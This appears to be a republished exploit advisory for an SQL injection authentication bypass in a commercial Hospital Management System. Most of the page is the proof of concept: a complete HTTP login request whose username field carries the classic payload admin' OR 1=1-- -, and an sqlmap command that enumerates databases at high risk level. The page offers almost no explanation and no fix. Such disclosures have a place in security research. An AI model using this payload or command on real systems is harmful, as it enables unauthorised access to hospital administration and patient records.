Title: Hospital Management System - Authentication Bypass With SQLi
Description: HMS Title: Hospital Management System - Authentication Bypass With SQLi
Description: HMS with MYSQL authentication bypass
Source URL: https://kj5.scriptsterraa.com/hms/admin/
Source Name/Email: Mehmet Can Kad?o?lu a.k.a mao7un
CVEs: N/A
Software URL: https://www.codester.com/items/53450/hospital-management-system-with-mysql
PoC:
Login Request
##############################################################
POST /hms/admin/ HTTP/2
Host: [target]
Cookie: PHPSESSID=5ea4e66d08d40b1a83ac3bcbeb71599f
Content-Length: 56
Cache-Control: max-age=0
Sec-Ch-Ua: "Not-A.Brand";v="99", "Chromium";v="124"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: https://kj5.scriptsterraa.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://[target]/hms/admin/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
username=admin%27+OR+1%3D1--+-&password=12345678&submit=
##############################################################
sqlmap command:
sqlmap --dbs --batch --level 2 --risk 3 --forms -u "
https://[target]/hms/admin/"
Hospital Management System SQL Injection / Authentication Bypass
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 98